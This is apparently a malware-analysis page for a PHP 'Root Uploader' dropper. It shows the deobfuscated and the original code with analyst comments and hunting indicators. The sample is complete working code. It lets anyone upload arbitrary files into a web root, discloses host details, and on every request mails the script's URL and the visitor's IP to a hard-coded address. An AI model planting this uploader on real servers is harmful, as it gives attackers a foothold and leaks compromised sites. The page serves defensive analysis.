PHP Malware Analysis


Tags

Emails
tangsel1928@gmail.com
Title
Home - Root Uplpader
Input
_POST
Environment
set_time_limit
php_uname

Deobfuscated code

//Powered By Mr.Colded X Mr.Cold//
//Team : 3RROR YOUR SYSTEM //
<title>Home - Root Uplpader </title><center>
<body bgcolor="black">
    <br><br><br><br>
    <br>
    <font color="red" size="5">> TegalXploiter <</font>
<font color="green"></center><br><br>
    <center>
<?php 
// ANALYST NOTE: this run is an unauthenticated file-upload dropper. Nothing in it
// checks who is calling, what type of file is sent, or what extension it carries.
// Strings useful for hunting (all taken from this sample): the form field name
// 'idx_file', the submit field 'upload', and the banner text "home uploader".

// Leftover values: neither $uploaddir nor $uploadfile is read again in this script,
// and the form below posts 'idx_file', not 'userfile'.
// NOTE(review): the hard-coded XAMPP path looks like an artifact of an earlier copy
// or of the author's environment; treat it as a weak indicator only.
$uploaddir = 'C:/xampp/htdocs/kampungkb/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
echo "home uploader<br>";
// Information disclosure: prints the host's OS/kernel identification string to any visitor.
echo "<b>" . php_uname() . "</b><br>";
// Upload form rendered to every visitor; there is no password, token or session check.
echo "<form method='post' enctype='multipart/form-data'>\n      <input type='file' name='idx_file'>\n      <input type='submit' name='upload' value='Upload'>\n      </form>";
// Primary drop location is the web server's document root.
$root = $_SERVER['DOCUMENT_ROOT'];
// Client-supplied file name, used as-is: no allow-list of extensions, no content check.
$files = $_FILES['idx_file']['name'];
$dest = $root . '/' . $files;
if (isset($_POST['upload'])) {
    if (is_writable($root)) {
        // copy() is used on the temp file instead of move_uploaded_file(), and '@'
        // suppresses any warning, so a failure leaves no PHP error output.
        if (@copy($_FILES['idx_file']['tmp_name'], $dest)) {
            // Success message links to the dropped file. $web already ends in '/',
            // so the printed URL contains a double slash; the file name is echoed
            // without HTML escaping.
            $web = "http://" . $_SERVER['HTTP_HOST'] . "/";
            echo "Sukses Cok! -> <a href='{$web}/{$files}' target='_blank'><b><u>{$web}/{$files}</u></b></a>";
        } else {
            // Indonesian: upload to the document root failed.
            echo "Gagal Upload Di Document Root.";
        }
    } else {
        // Fallback when the document root is not writable: copy to a relative path.
        // NOTE(review): this resolves against the process working directory, which is
        // presumably the directory holding this script ("Di Folder Ini" = "in this folder").
        if (@copy($_FILES['idx_file']['tmp_name'], $files)) {
            echo "Sukses Upload <b>{$files}</b> Di Folder Ini";
        } else {
            // Indonesian: upload failed.
            echo "Gagal uplod";
        }
    }
}
// ANALYST NOTE: call-home beacon. These statements sit outside any condition, so
// they run on every request to the script, not only when a file is uploaded.
// Hunting leads taken from this sample: outbound mail from the web server with
// subject "LOGGER", and the hard-coded recipient address below.

// Runtime tuning: errors hidden, no execution time limit, 64M memory cap.
// NOTE(review): output_buffering is normally not changeable via ini_set(); the call
// is error-suppressed, so a failure would be silent. Confirm on the target PHP build.
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
// Called after the script has already echoed page content; unless output is being
// buffered, PHP cannot send this header, and display_errors=0 hides the warning.
header('Content-Type: text/html; charset=UTF-8');
// Hard-coded recipient (the same address listed twice).
$tujuanmail = 'tangsel1928@gmail.com, tangsel1928@gmail.com';
// Full URL of this script as requested, i.e. where the uploader is installed.
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
// Message body: the script URL plus the IP address of whoever made the request.
$pesan_alert = "fix {$x_path} :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
// The fourth argument is mail()'s additional-headers position; the bracketed IP
// string passed here is not in "Name: value" header form.
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");


Original code

//Powered By Mr.Colded X Mr.Cold//
//Team : 3RROR YOUR SYSTEM //
<title>Home - Root Uplpader </title><center>
<body bgcolor="black">
    <br><br><br><br>
    <br>
    <font color="red" size="5">> TegalXploiter <</font>
<font color="green"></center><br><br>
    <center>
<?php
// ANALYST NOTE: this run is an unauthenticated file-upload dropper. Nothing in it
// checks who is calling, what type of file is sent, or what extension it carries.
// Strings useful for hunting (all taken from this sample): the form field name
// 'idx_file', the submit field 'upload', and the banner text "home uploader".

// Leftover values: neither $uploaddir nor $uploadfile is read again in this script,
// and the form below posts 'idx_file', not 'userfile'.
// NOTE(review): the hard-coded XAMPP path looks like an artifact of an earlier copy
// or of the author's environment; treat it as a weak indicator only.
$uploaddir = 'C:/xampp/htdocs/kampungkb/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
echo "home uploader<br>";
// Information disclosure: prints the host's OS/kernel identification string to any visitor.
echo "<b>".php_uname()."</b><br>";
// Upload form rendered to every visitor; there is no password, token or session check.
echo "<form method='post' enctype='multipart/form-data'>
      <input type='file' name='idx_file'>
      <input type='submit' name='upload' value='Upload'>
      </form>";
// Primary drop location is the web server's document root.
$root = $_SERVER['DOCUMENT_ROOT'];
// Client-supplied file name, used as-is: no allow-list of extensions, no content check.
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
    if(is_writable($root)) {
        // copy() is used on the temp file instead of move_uploaded_file(), and '@'
        // suppresses any warning, so a failure leaves no PHP error output.
        if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
            // Success message links to the dropped file. $web already ends in '/',
            // so the printed URL contains a double slash; the file name is echoed
            // without HTML escaping.
            $web = "http://".$_SERVER['HTTP_HOST']."/";
            echo "Sukses Cok! -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
        } else {
            // Indonesian: upload to the document root failed.
            echo "Gagal Upload Di Document Root.";
        }
    } else {
        // Fallback when the document root is not writable: copy to a relative path.
        // NOTE(review): this resolves against the process working directory, which is
        // presumably the directory holding this script ("Di Folder Ini" = "in this folder").
        if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
            echo "Sukses Upload <b>$files</b> Di Folder Ini";
        } else {
            // Indonesian: upload failed.
            echo "Gagal uplod";
        }
    }
}
?>
<?php
// ANALYST NOTE: call-home beacon. These statements sit outside any condition, so
// they run on every request to the script, not only when a file is uploaded.
// Hunting leads taken from this sample: outbound mail from the web server with
// subject "LOGGER", and the hard-coded recipient address below.

// Runtime tuning: errors hidden, no execution time limit, 64M memory cap.
// NOTE(review): output_buffering is normally not changeable via ini_set(); the call
// is error-suppressed, so a failure would be silent. Confirm on the target PHP build.
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
// Called after the script has already echoed page content; unless output is being
// buffered, PHP cannot send this header, and display_errors=0 hides the warning.
header('Content-Type: text/html; charset=UTF-8');
// Hard-coded recipient (the same address listed twice).
$tujuanmail = 'tangsel1928@gmail.com, tangsel1928@gmail.com';
// Full URL of this script as requested, i.e. where the uploader is installed.
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
// Message body: the script URL plus the IP address of whoever made the request.
$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
// The fourth argument is mail()'s additional-headers position; the bracketed IP
// string passed here is not in "Name: value" header form.
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
?>